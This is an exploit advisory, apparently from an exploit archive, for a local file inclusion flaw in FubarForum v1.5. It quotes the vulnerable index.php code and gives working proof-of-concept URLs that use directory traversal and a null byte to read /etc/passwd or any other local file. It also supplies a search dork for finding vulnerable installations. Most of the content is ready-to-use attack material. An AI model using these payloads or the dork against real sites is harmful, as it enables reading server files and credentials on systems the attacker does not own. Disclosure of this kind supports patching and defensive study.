FubarForum version 1.5 suffers from a local file inclusion vulnerability in index.php.
697bfce36204e5895f32c1f3907d7f29dcb89a0fccdc2a93c19e92f489d8eae1
###################################################################################
#
# Name : FubarForum v1.5 Local File Inclusion Vulnerability
# Author : cOndemned
# Dork : for ex. "Powered by FubarForum v1.5"
# Greetz : TBH, GregStar, ZaBeaTy, irk4z, Hawk, Sandtalker & Avantura ;*
#
###################################################################################
Source :
// index.php
5. if (!empty($_GET['page'])) { $page = $_GET['page']; } // <---- $page is being sended using GET method
91. if (file_exists("./".$page.".php")) { // <---- if only the file exists and we can use null byte (%00)
98. include("./".$page.".php"); // <---- our file will be included here :))
PoC :
https://[host]/[fubarforum_path]/index.php?page=../../../../etc/passwd%00
https://[host]/[fubarforum_path]/index.php?page=../../../../[local_file]%00
###################################################################################
#
# Together We stand tall, not gonna crash, not gonna fall - Children of Bodom
#
###################################################################################